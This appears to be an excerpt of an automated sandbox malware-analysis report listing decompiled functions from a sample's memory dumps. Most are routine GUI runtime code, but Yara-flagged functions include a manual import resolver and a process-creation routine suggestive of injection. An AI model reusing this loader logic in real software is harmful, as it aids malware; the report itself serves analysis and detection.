                          				_Unknown_base(*)()* _v24;
                          				CHAR* _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr* _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          
                          				_v32 = _a4;
                          				_v36 = _a4 +  *((intOrPtr*)(_v32 + 0x3c));
                          				_v40 = _v36 + 0xbadc25;
                          				_v44 =  *_v40;
                          				_v8 = _a4 + _v44;
                          				while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                          					_v28 = _a4 +  *((intOrPtr*)(_v8 + 0xc));
                          					_v12 = 0;
                          					_v12 = GetModuleHandleA(_v28);
                          					if(_v12 == 0) {
                          						_v12 = LoadLibraryA(_v28);
                          					}
                          					if(_v12 != 0) {
                          						_v16 = _a4 +  *((intOrPtr*)(_v8 + 0x10));
                          						_v20 = _a4 +  *_v8;
                          						if( *_v8 == 0) {
                          							_v20 = _v16;
                          						}
                          						while( *_v16 != 0) {
                          							_v48 = _a4 +  *_v20;
                          							_v24 = 0;
                          							if(( *_v20 & 0x80000000) == 0) {
                          								_v24 = GetProcAddress(_v12, _v48 + 2);
                          							} else {
                          								_v24 = GetProcAddress(_v12,  *_v20 & 0x0000ffff);
                          							}
                          							if( *_v16 != _v24) {
                          								 *_v16 = _v24;
                          							}
                          							_v16 = _v16 + 4;
                          							_v20 =  &(_v20[1]);
                          						}
                          						_v8 = _v8 + 0x14;
                          						continue;
                          					} else {
                          						return 0;
                          					}
                          				}
                          				return 1;
                          			}















                          APIs
                          • GetModuleHandleA.KERNEL32(?), ref: 042D35DF
                          • LoadLibraryA.KERNEL32(?), ref: 042D35F2
                          • GetProcAddress.KERNEL32(00000000,?), ref: 042D3663
                          • GetProcAddress.KERNEL32(00000000,?), ref: 042D3679
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$HandleLibraryLoadModule
                          • String ID:
                          • API String ID: 384173800-0
                          • Opcode ID: b812b404f2c3554a72ddb961c62b73aac1a879eb6be8a1fee13d983e18f34122
                          • Instruction ID: 69ea5a06f25232389600d1cfed7efe607be0ee7f72bc62f428c459b254788cb7
                          • Opcode Fuzzy Hash: b812b404f2c3554a72ddb961c62b73aac1a879eb6be8a1fee13d983e18f34122
                          • Instruction Fuzzy Hash: 9F41C474E11209EFCB04CF98C884BAEBBB1FF88305F208599D915AB351D774AA81CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027DB974(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v273;
                          				char _v534;
                          				char _v790;
                          				struct _MEMORY_BASIC_INFORMATION _v820;
                          				char _v824;
                          				intOrPtr _v828;
                          				char _v832;
                          				intOrPtr _v836;
                          				char _v840;
                          				intOrPtr _v844;
                          				char _v848;
                          				char* _v852;
                          				char _v856;
                          				char _v860;
                          				char _v1116;
                          				void* __edi;
                          				struct HINSTANCE__* _t40;
                          				intOrPtr _t51;
                          				struct HINSTANCE__* _t53;
                          				void* _t69;
                          				void* _t73;
                          				intOrPtr _t74;
                          				intOrPtr _t83;
                          				intOrPtr _t86;
                          				intOrPtr* _t87;
                          				void* _t93;
                          
                          				_t93 = __fp0;
                          				_v8 = __ecx;
                          				_t73 = __edx;
                          				_t87 = __eax;
                          				VirtualQuery(__edx,  &_v820, 0x1c);
                          				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                          					_t40 =  *0x2865668; // 0x27d0000
                          					GetModuleFileNameA(_t40,  &_v534, 0x105);
                          					_v12 = E027DB968(_t73);
                          				} else {
                          					_v12 = _t73 - _v820.AllocationBase;
                          				}
                          				E027D8BEC( &_v273, 0x104, E027DC9DC(0x5c) + 1);
                          				_t74 = 0x27dbaf4;
                          				_t86 = 0x27dbaf4;
                          				_t83 =  *0x27d7544; // 0x27d7590
                          				if(E027D3398(_t87, _t83) != 0) {
                          					_t74 = E027D45A8( *((intOrPtr*)(_t87 + 4)));
                          					_t69 = E027D8B88(_t74, 0x27dbaf4);
                          					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                          						_t86 = 0x27dbaf8;
                          					}
                          				}
                          				_t51 =  *0x286475c; // 0x27d72bc
                          				_t16 = _t51 + 4; // 0xffeb
                          				_t53 =  *0x2865668; // 0x27d0000
                          				LoadStringA(E027D5568(_t53),  *_t16,  &_v790, 0x100);
                          				E027D315C( *_t87,  &_v1116);
                          				_v860 =  &_v1116;
                          				_v856 = 4;
                          				_v852 =  &_v273;
                          				_v848 = 6;
                          				_v844 = _v12;
                          				_v840 = 5;
                          				_v836 = _t74;
                          				_v832 = 6;
                          				_v828 = _t86;
                          				_v824 = 6;
                          				E027D9224(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                          				return E027D8B88(_v8, _t86);
                          			}
































                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DB991
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DB9B5
                          • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DB9D0
                          • LoadStringA.USER32(00000000,0000FFEB,?,00000100), ref: 027DBA66
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID:
                          • API String ID: 3990497365-0
                          • Opcode ID: be3881b77907dca8ccf3935f3f40e31c66673c5786eb6c7d59cd1f393b31fb96
                          • Instruction ID: 8b50d41e1ddcc8d8613d1ce912fff04cd749dfcc7e71ca84698ebd6c43d88f88
                          • Opcode Fuzzy Hash: be3881b77907dca8ccf3935f3f40e31c66673c5786eb6c7d59cd1f393b31fb96
                          • Instruction Fuzzy Hash: 4C413B70A402589FCB22DB68DC88BDAB7FDAB58304F4410E6A548E7251D774AF84CF11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027DB972(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v273;
                          				char _v534;
                          				char _v790;
                          				struct _MEMORY_BASIC_INFORMATION _v820;
                          				char _v824;
                          				intOrPtr _v828;
                          				char _v832;
                          				intOrPtr _v836;
                          				char _v840;
                          				intOrPtr _v844;
                          				char _v848;
                          				char* _v852;
                          				char _v856;
                          				char _v860;
                          				char _v1116;
                          				void* __edi;
                          				struct HINSTANCE__* _t40;
                          				intOrPtr _t51;
                          				struct HINSTANCE__* _t53;
                          				void* _t69;
                          				void* _t74;
                          				intOrPtr _t75;
                          				intOrPtr _t85;
                          				intOrPtr _t89;
                          				intOrPtr* _t92;
                          				void* _t105;
                          
                          				_v8 = __ecx;
                          				_t74 = __edx;
                          				_t92 = __eax;
                          				VirtualQuery(__edx,  &_v820, 0x1c);
                          				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                          					_t40 =  *0x2865668; // 0x27d0000
                          					GetModuleFileNameA(_t40,  &_v534, 0x105);
                          					_v12 = E027DB968(_t74);
                          				} else {
                          					_v12 = _t74 - _v820.AllocationBase;
                          				}
                          				E027D8BEC( &_v273, 0x104, E027DC9DC(0x5c) + 1);
                          				_t75 = 0x27dbaf4;
                          				_t89 = 0x27dbaf4;
                          				_t85 =  *0x27d7544; // 0x27d7590
                          				if(E027D3398(_t92, _t85) != 0) {
                          					_t75 = E027D45A8( *((intOrPtr*)(_t92 + 4)));
                          					_t69 = E027D8B88(_t75, 0x27dbaf4);
                          					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                          						_t89 = 0x27dbaf8;
                          					}
                          				}
                          				_t51 =  *0x286475c; // 0x27d72bc
                          				_t16 = _t51 + 4; // 0xffeb
                          				_t53 =  *0x2865668; // 0x27d0000
                          				LoadStringA(E027D5568(_t53),  *_t16,  &_v790, 0x100);
                          				E027D315C( *_t92,  &_v1116);
                          				_v860 =  &_v1116;
                          				_v856 = 4;
                          				_v852 =  &_v273;
                          				_v848 = 6;
                          				_v844 = _v12;
                          				_v840 = 5;
                          				_v836 = _t75;
                          				_v832 = 6;
                          				_v828 = _t89;
                          				_v824 = 6;
                          				E027D9224(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                          				return E027D8B88(_v8, _t89);
                          			}
































                          APIs
                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DB991
                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DB9B5
                          • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DB9D0
                          • LoadStringA.USER32(00000000,0000FFEB,?,00000100), ref: 027DBA66
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: FileModuleName$LoadQueryStringVirtual
                          • String ID:
                          • API String ID: 3990497365-0
                          • Opcode ID: f29f609fb3fb7a3ff6598a542f0764ff872855d49df3218a03e9460b32c2bd36
                          • Instruction ID: b9986612353fe024960aca5fbdeb65ffbe3c6b53545b88b46c1f43fd632b2828
                          • Opcode Fuzzy Hash: f29f609fb3fb7a3ff6598a542f0764ff872855d49df3218a03e9460b32c2bd36
                          • Instruction Fuzzy Hash: 89413B70A402589FDB22DB68DC88BDAB7FDAB58304F4410E6A548E7251DB74AF84CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027DCB30() {
                          				char _v152;
                          				short _v410;
                          				signed short _t14;
                          				signed int _t16;
                          				int _t18;
                          				void* _t20;
                          				void* _t23;
                          				int _t24;
                          				int _t26;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t32;
                          				signed int _t37;
                          				int* _t39;
                          				short* _t41;
                          				void* _t49;
                          
                          				 *0x2865748 = 0x409;
                          				 *0x286574c = 9;
                          				 *0x2865750 = 1;
                          				_t14 = GetThreadLocale();
                          				if(_t14 != 0) {
                          					 *0x2865748 = _t14;
                          				}
                          				if(_t14 != 0) {
                          					 *0x286574c = _t14 & 0x3ff;
                          					 *0x2865750 = (_t14 & 0x0000ffff) >> 0xa;
                          				}
                          				memcpy(0x286311c, 0x27dcc84, 8 << 2);
                          				if( *0x28630d4 != 2) {
                          					_t16 = GetSystemMetrics(0x4a);
                          					__eflags = _t16;
                          					 *0x2865755 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                          					_t18 = GetSystemMetrics(0x2a);
                          					__eflags = _t18;
                          					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                          					 *0x2865754 = _t31;
                          					__eflags = _t31;
                          					if(__eflags != 0) {
                          						return E027DCAB8(__eflags, _t49);
                          					}
                          				} else {
                          					_t20 = E027DCB18();
                          					if(_t20 != 0) {
                          						 *0x2865755 = 0;
                          						 *0x2865754 = 0;
                          						return _t20;
                          					}
                          					E027DCAB8(__eflags, _t49);
                          					_t37 = 0x20;
                          					_t23 = E027D2D44(0x286311c, 0x20, 0x27dcc84);
                          					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                          					 *0x2865754 = _t32;
                          					__eflags = _t32;
                          					if(_t32 != 0) {
                          						 *0x2865755 = 0;
                          						return _t23;
                          					}
                          					_t24 = 0x80;
                          					_t39 =  &_v152;
                          					do {
                          						 *_t39 = _t24;
                          						_t24 = _t24 + 1;
                          						_t39 =  &(_t39[0]);
                          						__eflags = _t24 - 0x100;
                          					} while (_t24 != 0x100);
                          					_t26 =  *0x2865748; // 0x409
                          					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                          					_t18 = 0x80;
                          					_t41 =  &_v410;
                          					while(1) {
                          						__eflags =  *_t41 - 2;
                          						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                          						 *0x2865755 = _t37;
                          						__eflags = _t37;
                          						if(_t37 != 0) {
                          							goto L17;
                          						}
                          						_t41 = _t41 + 2;
                          						_t18 = _t18 - 1;
                          						__eflags = _t18;
                          						if(_t18 != 0) {
                          							continue;
                          						} else {
                          							return _t18;
                          						}
                          						L18:
                          					}
                          				}
                          				L17:
                          				return _t18;
                          				goto L18;
                          			}




















                          APIs
                          • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 027DCC24
                          • GetThreadLocale.KERNEL32 ref: 027DCB5A
                            • Part of subcall function 027DCAB8: GetCPInfo.KERNEL32(00000000,?), ref: 027DCAD1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocaleStringThreadType
                          • String ID:
                          • API String ID: 1505017576-0
                          • Opcode ID: bb95744d8ce3ff645ba43c21ed392deed711bdbdf75b8a959a902232885f7aa0
                          • Instruction ID: 768a52e939b3bc7240e8264e2fb574117e6ca3b3d5857a7ba5446583e4223d56
                          • Opcode Fuzzy Hash: bb95744d8ce3ff645ba43c21ed392deed711bdbdf75b8a959a902232885f7aa0
                          • Instruction Fuzzy Hash: F3313B65D81285CAD723D734B4197A637BAEB42304F84489BD5888F2C1DB798859C761
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02831AF4(int __eax, intOrPtr* __edx) {
                          				void* _t30;
                          				int _t33;
                          				int _t66;
                          				int _t70;
                          				void* _t77;
                          
                          				_t57 = __edx;
                          				_t68 = __eax;
                          				if( *((intOrPtr*)(__eax + 0x180)) == 0) {
                          					return E0282EB9C(__eax, __edx);
                          				}
                          				_t65 =  *__edx;
                          				if( *__edx != 0x7b ||  *((intOrPtr*)(__eax + 0x30)) == 0) {
                          					L4:
                          					_t66 =  *_t57;
                          					_t30 = _t66 + 0xfffffece - 7;
                          					if(_t30 < 0) {
                          						_t57[3] = SendMessageA(_t57[2], _t66 + 0xbc00, _t57[1], _t57[2]);
                          					} else {
                          						if(_t30 + 0xffff4407 - 7 < 0) {
                          							SetTextColor(_t57[1], E027F7018( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x68)) + 0x18))));
                          							SetBkColor(_t57[1], E027F7018(E027F7C9C( *((intOrPtr*)(_t68 + 0x170)))));
                          							_t57[3] = E027F7CD8( *((intOrPtr*)(_t68 + 0x170)));
                          						} else {
                          							_t77 = _t66 -  *0x2865bac; // 0xc279
                          							if(_t77 != 0) {
                          								_t57[3] = CallWindowProcA( *(_t68 + 0x174),  *(_t68 + 0x180), _t66, _t57[1], _t57[2]);
                          							} else {
                          								_t57[3] = _t68;
                          							}
                          						}
                          					}
                          					_t33 =  *_t57;
                          					if(_t33 != 0xc) {
                          						goto L15;
                          					} else {
                          						return E0282D2F0(_t68, _t57[1], _t33, _t57[2]);
                          					}
                          				} else {
                          					_t33 = E0282E93C( *((intOrPtr*)(__eax + 0x30)),  *((intOrPtr*)(__edx + 4)), _t65,  *((intOrPtr*)(__edx + 8)));
                          					_t70 = _t33;
                          					_t57[3] = _t70;
                          					if(_t70 != 0) {
                          						L15:
                          						return _t33;
                          					}
                          					goto L4;
                          				}
                          			}









                          APIs
                          • SendMessageA.USER32(?,?,?,?), ref: 02831B5E
                            • Part of subcall function 027F7018: GetSysColor.USER32(?), ref: 027F7022
                          • SetTextColor.GDI32(?,00000000), ref: 02831B78
                          • SetBkColor.GDI32(?,00000000), ref: 02831B92
                            • Part of subcall function 027F7CD8: CreateBrushIndirect.GDI32(?), ref: 027F7D82
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Color$BrushCreateIndirectMessageSendText
                          • String ID:
                          • API String ID: 3173815208-0
                          • Opcode ID: 7d9b02369e0704d28c000a1f83fe8b663a5406d6d3a768ed7f8aba4ee20fc6e0
                          • Instruction ID: fd7b38b2f713a58ef76a8fb6003d910c31d0d8b07ab2ea446d94e0000dab956f
                          • Opcode Fuzzy Hash: 7d9b02369e0704d28c000a1f83fe8b663a5406d6d3a768ed7f8aba4ee20fc6e0
                          • Instruction Fuzzy Hash: E6318BBD600604DFCB52EE6DC8C8A96B7EAAF48710B088459E54DCF315EB34E841CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E027FB738(intOrPtr __eax, void* __edx) {
                          				intOrPtr _v8;
                          				void* __ebx;
                          				void* __ecx;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t33;
                          				intOrPtr _t59;
                          				struct HDC__* _t69;
                          				void* _t70;
                          				intOrPtr _t79;
                          				void* _t84;
                          				struct HPALETTE__* _t85;
                          				intOrPtr _t87;
                          				intOrPtr _t89;
                          
                          				_t87 = _t89;
                          				_push(_t70);
                          				_v8 = __eax;
                          				_t33 = _v8;
                          				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                          					return _t33;
                          				} else {
                          					E027F8188(_v8);
                          					_push(_t87);
                          					_push(0x27fb817);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t89;
                          					E027FCB40( *((intOrPtr*)(_v8 + 0x58)));
                          					E027FB5B4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                          					E027FCC40( *((intOrPtr*)(_v8 + 0x58)));
                          					_t69 = CreateCompatibleDC(0);
                          					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                          					if(_t84 == 0) {
                          						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                          					} else {
                          						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
                          					}
                          					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
                          					if(_t85 == 0) {
                          						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                          					} else {
                          						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
                          						RealizePalette(_t69);
                          					}
                          					E027F856C(_v8, _t69);
                          					_t59 =  *0x28638a0; // 0x41d0acc
                          					E027EB558(_t59, _t69, _t70, _v8, _t85);
                          					_pop(_t79);
                          					 *[fs:eax] = _t79;
                          					_push(0x27fb81e);
                          					return E027F83C0(_v8);
                          				}
                          			}


















                          APIs
                            • Part of subcall function 027F8188: RtlEnterCriticalSection.KERNEL32(028658FC,00000000,027F6B6A,00000000,027F6BC9), ref: 027F8190
                            • Part of subcall function 027F8188: RtlLeaveCriticalSection.KERNEL32(028658FC,028658FC,00000000,027F6B6A,00000000,027F6BC9), ref: 027F819D
                            • Part of subcall function 027F8188: RtlEnterCriticalSection.KERNEL32(00000038,028658FC,028658FC,00000000,027F6B6A,00000000,027F6BC9), ref: 027F81A6
                            • Part of subcall function 027FCC40: GetDC.USER32(00000000), ref: 027FCC96
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000C), ref: 027FCCAB
                            • Part of subcall function 027FCC40: GetDeviceCaps.GDI32(00000000,0000000E), ref: 027FCCB5
                            • Part of subcall function 027FCC40: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,027FB78B,00000000,027FB817), ref: 027FCCD9
                            • Part of subcall function 027FCC40: ReleaseDC.USER32(00000000,00000000), ref: 027FCCE4
                          • CreateCompatibleDC.GDI32(00000000), ref: 027FB78D
                          • SelectObject.GDI32(00000000,?), ref: 027FB7A6
                          • SelectPalette.GDI32(00000000,?,000000FF), ref: 027FB7CF
                          • RealizePalette.GDI32(00000000), ref: 027FB7DB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                          • String ID:
                          • API String ID: 979337279-0
                          • Opcode ID: 44d5bfa939219d9537dab496e402d3f108a8781078ea74c0324a978864df5f5a
                          • Instruction ID: 17a783e905f9889d771d7cb79a0918935d1d0b0c2d22b8d5f557363a15d24be1
                          • Opcode Fuzzy Hash: 44d5bfa939219d9537dab496e402d3f108a8781078ea74c0324a978864df5f5a
                          • Instruction Fuzzy Hash: CD313474A08658EFDB45EB68D985D5DB7FAEF48720B2281A5E904AB321C730EE40DF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E02856AE4(void* __eax, void* __ebx, int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12) {
                          				struct tagRECT _v20;
                          				int _t30;
                          				int _t43;
                          				void* _t51;
                          				intOrPtr _t58;
                          				CHAR* _t61;
                          				int _t64;
                          				void* _t67;
                          
                          				asm("movsd");
                          				asm("movsd");
                          				asm("movsd");
                          				asm("movsd");
                          				_t64 = __ecx;
                          				_t51 = __eax;
                          				E027D4598(_a12);
                          				_push(_t67);
                          				_push(0x2856bac);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t67 + 0xfffffff0;
                          				OffsetRect( &_v20, 1, 1);
                          				E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a4);
                          				_t30 = E027D43A8(_a12);
                          				_t61 = E027D45A8(_a12);
                          				DrawTextA(E027F84EC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t30,  &_v20, _t64);
                          				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                          				E027F74D8( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x160)) + 0xc)), _a8);
                          				_t43 = E027D43A8(_a12);
                          				DrawTextA(E027F84EC( *((intOrPtr*)(_t51 + 0x160))), _t61, _t43,  &_v20, _t64);
                          				_pop(_t58);
                          				 *[fs:eax] = _t58;
                          				_push(0x2856bb3);
                          				return E027D40E8( &_a12);
                          			}












                          APIs
                          • OffsetRect.USER32(?,00000001,00000001), ref: 02856B18
                          • DrawTextA.USER32(00000000,00000000,00000000,?), ref: 02856B53
                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 02856B60
                          • DrawTextA.USER32(00000000,00000000,00000000,?), ref: 02856B91
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DrawOffsetRectText
                          • String ID:
                          • API String ID: 429220523-0
                          • Opcode ID: 75b82337afd0ee97b9ffe70840b33249dc860a1d009b62303dd7608648e3b203
                          • Instruction ID: ea72f802bf6514a27c50217fec6e5e63e61b9788f3bf0e29ad96bff032cfc61f
                          • Opcode Fuzzy Hash: 75b82337afd0ee97b9ffe70840b33249dc860a1d009b62303dd7608648e3b203
                          • Instruction Fuzzy Hash: C9215C716142196FDB42EF68DC84DABB3BEFF49320F454571BD24EB290DA71EC008A60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E028271F4(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                          				intOrPtr _v8;
                          				void* __ecx;
                          				void* __edi;
                          				int _t27;
                          				void* _t40;
                          				int _t41;
                          				int _t50;
                          
                          				_t50 = _t41;
                          				_t49 = __edx;
                          				_t40 = __eax;
                          				if(E02826900(__eax) == 0) {
                          					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                          				}
                          				_v8 = 0;
                          				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                          					_t27 = GetMenuItemID(_t49, _t50);
                          					_t51 = _t27;
                          					if(_t27 != 0xffffffff) {
                          						_v8 = E0282677C(_t40, 0, _t51);
                          					}
                          				} else {
                          					_t49 = GetSubMenu(_t49, _t50);
                          					_v8 = E0282677C(_t40, 1, _t37);
                          				}
                          				if(_v8 == 0) {
                          					return 0;
                          				} else {
                          					 *_a12 = 0;
                          					E027D8C44(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                          					return E027D8B88(_a12, _t49);
                          				}
                          			}











                          APIs
                          • GetMenuState.USER32(?,?,00000000), ref: 02827217
                          • GetSubMenu.USER32(?,?), ref: 02827222
                          • GetMenuItemID.USER32(?,?), ref: 0282723B
                          • GetMenuStringA.USER32(?,?,?,?,00000000), ref: 0282728E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$ItemStateString
                          • String ID:
                          • API String ID: 306270399-0
                          • Opcode ID: cb648b4827473fed9a536e1e97f0bef146852bbd4efffc2f85ec9b5f268f18b3
                          • Instruction ID: 9c7e80a4bd71e3ae1148af2034c7d64443318043bfa31d11e688548753ab8cf5
                          • Opcode Fuzzy Hash: cb648b4827473fed9a536e1e97f0bef146852bbd4efffc2f85ec9b5f268f18b3
                          • Instruction Fuzzy Hash: D111BE39602228AF9701EE6ECC84AAFB7FEDF49364B144429F80AD7240D6309D45CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D2B80(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                          				void* _v8;
                          				long _v12;
                          				void* _v16;
                          				char _v20;
                          				char _v24;
                          
                          				_v12 = 0xffffffff;
                          				if(E042D2B40(__ecx, _a4) != 0) {
                          					if(E042D2C40( &_v8,  &_v16) != 0) {
                          						if(E042D3270(_v8, _a4, _a8,  &_v24,  &_v20) == 1 && E042D37E0(_v8, _v16, _v24, _v20) == 1) {
                          							_v12 = GetProcessId(_v8);
                          						}
                          						if(_v12 == 0xffffffff) {
                          							TerminateProcess(_v8, 0);
                          						}
                          						CloseHandle(_v16);
                          						CloseHandle(_v8);
                          						return _v12;
                          					}
                          					return _v12;
                          				}
                          				return 0;
                          			}









                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e1da2ea824efcabf5825ea85d6c4d462b4847f951d9eec75517496f6534544c
                          • Instruction ID: d1846e2ee4c35c0f4dc05b502847fadf0e8cf93d16157e3eb4961ffb4d67ec89
                          • Opcode Fuzzy Hash: 2e1da2ea824efcabf5825ea85d6c4d462b4847f951d9eec75517496f6534544c
